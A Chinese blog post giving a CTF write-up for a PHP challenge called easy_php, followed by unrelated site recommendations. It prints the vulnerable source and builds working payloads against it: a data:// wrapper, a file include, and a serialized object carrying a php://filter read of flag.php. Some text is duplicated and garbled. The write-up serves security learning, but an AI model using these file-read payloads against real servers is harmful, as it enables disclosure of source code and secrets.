SWCTF

已于 2024-04-21 19:41:08 修改
阅读量780 收藏 29
点赞数 11
文章标签: 笔记
于 2024-04-21 01:19:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/W286734/article/details/138014850
版权

easy_php

源码

<?php

// flag is in flag.php
highlight_file(__FILE__);
ini_set('display_errors', 0);
error_reporting(0);

if (isset($_GET['myon1']) && isset($_GET['myon2']) && isset($_GET['myon3'])) {
    $myon1 = $_GET['myon1'];
    $myon2 = $_GET['myon2'];
    $myon3 = $_GET['myon3'];

    if (file_get_contents($myon1) === "hello Myon!") {
        echo "welcome!";
    } else {
        die("you can't see the flag!");
    }

    if (stripos($myon2, "flag") !== false || preg_match("/flag/i", $myon2)) {
        die("Access denied!");
    } else {
        include($myon2);  // myon.php
        $my = unserialize($myon3);
        echo $my;
    }
}

?>

代码分析

提亮字体

highlight_file(__FILE__);

关闭错误回显,暴露出的信息越少越有利于网站的自我保护

ini_set('display_errors', 0);
error_reporting(0);

同时get传入三个参数,必须同时传入三个参数mony1,mony2,mony3少传一个都不会执行最大的这个if

if (isset($_GET['myon1']) && isset($_GET['myon2']) && isset($_GET['myon3']))

设置三个变量用来存储传入的参数用于后续代码执行

$myon1 = $_GET['myon1'];
$myon2 = $_GET['myon2'];
$myon3 = $_GET['myon3'];

此函数的判断条件是mony1储存的数据是否全等于hello Myon!如果是则输出welcom!,否则

if (file_get_contents($myon1) === "hello Myon!") {
        echo "welcome!";
    } else {
        die("you can't see the flag!");
    }

匹配mony2中最后一次出现flag的位置,出现了则不全等flase
stripos($myon2, “flag”) !== false

正则表达式匹配flag,i标识不区分大小写
preg_match(“/flag/i”, $myon2)

总之就是||前后的都必须为假也就是mony2中不能有flag字符串,不然就终止程序并且输出Access denied!,如果都没有包含flag,就文件包含mony2

if (stripos($myon2, "flag") !== false || preg_match("/flag/i", $myon2)) {
        die("Access denied!");
    } else {
        include($myon2);  // myon.php
        $my = unserialize($myon3);
        echo $my;
    }

其次这个函数里还创建了一个变量my将mony3反序列化后赋值给了my最后输出my

序列化,反序列化

序列化就是将对象转换为字符串,反序列化将字符串转换为对象
可以看看这个博主写的

构建参数

mony1:目的输出welcom!

myon1=data://text/plain;base64,aGVsbG8gTXlvbiE=
为什么这么构造呢,你先不管后两个参数的内容是什么,只将第一个参数mony1的值改为hello world在这里插入图片描述之后我做了很多此尝试发现始终不会输出welcom,所以这里大概率是做了过滤,应该是把空格处理了,然后我尝试将空格替换成了url编码的格式还是不行在这里插入图片描述
这里我做了很多尝试,想到了base64编码,但是还是在这里插入图片描述
在这里插入图片描述
伪协议可以参考学习一下这个博主的
它不知道这个是base64编码,我们要告诉它,这就需要利用data://控制输入流告诉它这里有base编码。
也就是

myon1=data://text/plain;base64,aGVsbG8gTXlvbiE=

在这里插入图片描述

mony2

看到了提示,myon.php
在这里插入图片描述
当给 m y o n 2 传递参数为 m y o n . p h p 时,接下来的代码执行如下: 1. i n c l u d e ( myon2 传递参数为 myon.php 时,接下来的代码执行如下: 1.include( myon2传递参数为myon.php时,接下来的代码执行如下:1.include(myon2);:这会包含 myon.php 文件的内容。如果 myon.php 存在并且可访问,其中的代码将被执行。
2. m y = u n s e r i a l i z e ( my = unserialize( my=unserialize(myon3);:这一行尝试对 m y o n 3 进行反序列化操作。 myon3 进行反序列化操作。 myon3进行反序列化操作。myon3 包含了一个序列化的对象,如果反序列化成功,会将对象存储在变量 $my 中。

这样就行了

myon2=myon.php.

myon3

在这里插入图片描述
根据此模板构造
在这里插入图片描述
试着传入myon3的值,一般编码读取的成功性更大

myon3=O:4:"Myon":1:{s:4:"myon";s:57:"php://filter/read=convert.base64-encode/resource=myon.php";}

在这里插入图片描述
在这里插入图片描述
这个序列化的对象表示一个名为 “Myon” 的类,其中有一个名为 “myon” 的属性
可以直接读取myon.php的文件那不妨直接试试读取flag.php,这里给了提示
在这里插入图片描述

myon3=O:4:"Myon":1:{s:4:"myon";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}
类似的我们还可以读取网页源码

在这里插入图片描述

将三者拼接到一起就成功获取了一个fbase64加密的flag

myon1=data://text/plain;base64,aGVsbG8gTXlvbiE=&myon2=myon.php&myon3=O:4:"Myon":1:{s:4:"myon";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}
玖龍的意志
关注
  • 11
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【论文阅读笔记】ASPS: Augmented Segment Anything Model for Polyp Segmentation
qq_46056318的博客
07-08 633
ASPS:用于息肉分割的扩展SAM模型2024年 arxivPaperCode息肉分割在结直肠癌诊断中起着至关重要的作用。最近,Segment Anything Model(SAM)的出现利用其在大规模数据集上的强大预训练能力,为息肉分割带来了前所未有的潜力。然而,由于自然图像和内窥镜图像之间的区域差距,SAM在实现有效的息肉分割方面遇到了两个限制。首先,它的基于变压器的结构优先考虑全局和低频信息,可能会忽略局部细节,并在学习的特征中引入偏差。
生物化学笔记:电阻抗基础+电化学阻抗谱EIS+电化学系统频率响应分析
ResumeProject的博客
07-06 1544
阻抗通常用复数表示(这是一个二维表示),包括实部(用来表示电阻成分,对幅值的影响)和虚部(用来表示电感或电容成分,对相位的影响)。
MyBatis框架学习笔记(一):MyBatis入门
2301_76144723的博客
07-08 467
MyBatis 中文手册:(1)https://mybatis.org/mybatis-3/zh/index.html(2)https://mybatis.net.cn/Maven 仓库:https://mvnrepository.com/ 仓库作用:需要什么 jar 包,搜索得到对应的 maven dependency传统的 Java 程序操作 DB 分析-工作示意图(1)MyBatis 是一个持久层框架 (2)前身是 ibatis, 在 ibatis3.x 时,更名为 MyBatis (3)MyBati
Hugging Face使用笔记
人无远虑,必有近忧
07-09 1491
Hugging Face Hub和 Github 类似,都是Hub(社区)。Hugging Face可以说的上是机器学习界的Github。hugging face在NLP领域最出名,其提供的模型大多都是基于Transformer的。
Vue笔记12-新的组件
王劭阳的博客
07-07 342
是一个内置组件,用来在组件树中协调对异步依赖的处理。它让我们可以在组件树上层等待下层的多个嵌套异步依赖项解析完成,并可以在等待时渲染一个加载状态,需要结合异步依赖,才能看到效果。在Vue3中,可以没有div根标签,如果没有的话,Vue3会将多个标签包装在一个。在Vue2中,template标签内,必须有一个div标签,作为根标签。是一个内置组件,可以将一个组件内部的模板传送到该组件DOM外部的位置去。
【算法笔记自学】第 5 章 入门篇(3)——数学问题
qq_62704693的博客
07-06 2027
【代码】【算法笔记自学】入门篇(3)——数学问题。
vb.net&cad二开自学笔记2:认识vs编辑器
nianfen的博客
07-06 285
认识一下宇宙第一编辑器的界面图标含义还是很重要的,否则都不知道面对的是什么还怎么继续?变量长方体:变量局部变量两个矩形块:枚举预定义的枚举紫色立方体:方法橙色树状结构:类灰色块:自定义的代码片段接口/typedef向左对齐的关键字图标倒着脸的结构体图标显得规规矩矩的宏定义图标大括号的命名空间图标事件属性委托。
javascript高级部分笔记
喵喵的博客
07-09 1257
javascript高级部分 Function方法 与 函数式编程 call 语法:call([thisObj[,arg1[, arg2[, [,.argN]]]]]) 定义:调用一个对象的一个方法,以另一个对象替换当前对象。 说明:call 方法可以用来代替另一个对象调用一个方法。call 方法可将一个函数的对象上下文从初始的上下文改变为由 thisObj 指定的新对象。 如果没有提供 thisObj 参数,那么 Global 对象被用作 thisObj。 let myName = 'goudan
C++学习笔记
qq_45882170的博客
07-09 1001
默认参数值只能在函数声明中指定,而不能在函数定义中指定。如果同时有声明和定义,并且两者都试图为同一个参数指定默认值,这会导致编译错误。
『大模型笔记』GraphRAG:用于复杂数据发现的新工具现已在GitHub上发布
AI新视界
07-09 459
GraphRAG:用于复杂数据发现的新工具现已在GitHub上发布
《算法笔记》总结No.4——散列
前端,算法,MATLAB,统计学爱好者,目前主攻Web全栈+考研内容
07-07 724
散列的英文名是hash,即我们常说的哈希~该知识点在王道408考研的教材里面属于的范围。即便各位并无深入了解过,也听说过散列是一种更高效的查找方法。
线程同步笔记
wjlo1的博客
07-08 1097
①线程同步为了对共享资源的访问进行(多个线程操作一个全局变量)②保护的目的是为了解决的问题。如果其他线程不会对变量进行修改和读取那么不存在数据一致性问题如果其他线程对变量只能读那么也不存在数据一致性问题如果其他线程可以对变量进行修改那么一定存在数据一致性问题③出现数据一致性问题其本质在于进程中的多个线程对共享资源的。
【unity笔记】常见问题收集
最新发布
王尼莫的博客
07-11 96
参考官方文档,GI(Global Illumination) data 指的是全局照明信息。在Unity的Edit->Preference中,可以编辑GI缓存路径和分配GI缓存大小。
笔记15:while语句编程练习
m0_71276503的博客
07-06 425
提示:π/4=1-1/3+1/5-1/7 +1/9-......编写程序,求 2^2+4^2+6^2+...+n^2?-直到累加和大于或等于 10000 为止,输出累加和。√分别打印前100,1000,10000项计算的T值。√打印最后一项的绝对值小于 10-6 时候的 π 值。-输出累加式中的项数ì,以及最大的数 n。-编写程序,近似计算圆周率 π的值。
算法学习笔记(8.1)-动态规划入门
2301_76874968的博客
07-09 615
算法学习笔记(8.1)-动态规划入门
【MIT 6.5840/6.824】Lab汇总与论文学习笔记
juruo_c的博客
07-06 207
又来开新坑啦!6.824启动!最新课程更改为了,内容大差不差,所以我准备直接做spring2024的lab啦!搭配2021的lecture食用~学习过程大概是看paper->看lecture->写lab,我会分享自己的Lab思路,但是不会直接公开源码!
谷粒商城学习笔记-19-快速开发-逆向生成所有微服务基本CRUD代码
epitomizelu的专栏
07-08 935
接下来使用逆向工程为商品服务gulimall-product生成相关的代码,其他的服务生成代码的步骤相似。在开发工程中,可能同时启动多个服务,为了避免端口冲突,为每个模块分配一个端口。然后把解压的main文件夹中的内容,拷贝到打开的main文件夹中。gulimall-coupon,优惠券模块的模块名为coupon。gulimall-order,订单模块对应的模块名为order。gulimall-member,会员模块的模块名为member。gulimall-ware,仓储模块的模块名为ware。
HTML5 学习笔记总结
爱敲代码的卡拉米的博客
07-08 314
网站是指在因特网上根据一定的规则,使用HTML等制作的用于展示特定内容相关的网页集合网页是网站中的一“页”,通常是 HTML 格式的文件,它要通过浏览器来阅读网页是构成网站的基本元素,它通常由图片,链接,声音,文字,视频等元素组成。通常我们看到的网页,常见以.htm或.html后缀结尾的文件,因此将其俗称为 HTML 文件HTML 指的是超文本标记语言(Hyper Text Markup Language),它是用来描述网页的一种语言。
ALG:MODTRAN查找表参数详解(学习笔记4)
Home
07-09 970
ALG在建立MODTRAN查找表中的输入参数
线性回归笔记
Ritter Liu的专栏
07-09 286
在回归模型中,假定残差的期望值为0,方差相等且服从正态分布的一个随机变量。但是,若关于残差的假定不成立,此时所做的检验以及估计和预测也许站不住脚。1-1残差图的定义:是指以某种残差为纵坐标,以其他适宜的量为横坐标的散点图。3、以自变量为条件的残差的期望值为0:E(ε|X1,X2,…不论回归值的大小,而残差(或)具有相同的分布,并满足模型的各假设条件;4、残差项的方差对于所有观察值都是相同的:E(εi2)=σε2。表示回归值的大小与残差的波动大小有关系,即等方差性的假设有问题;,Xk之间的关系是线性的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值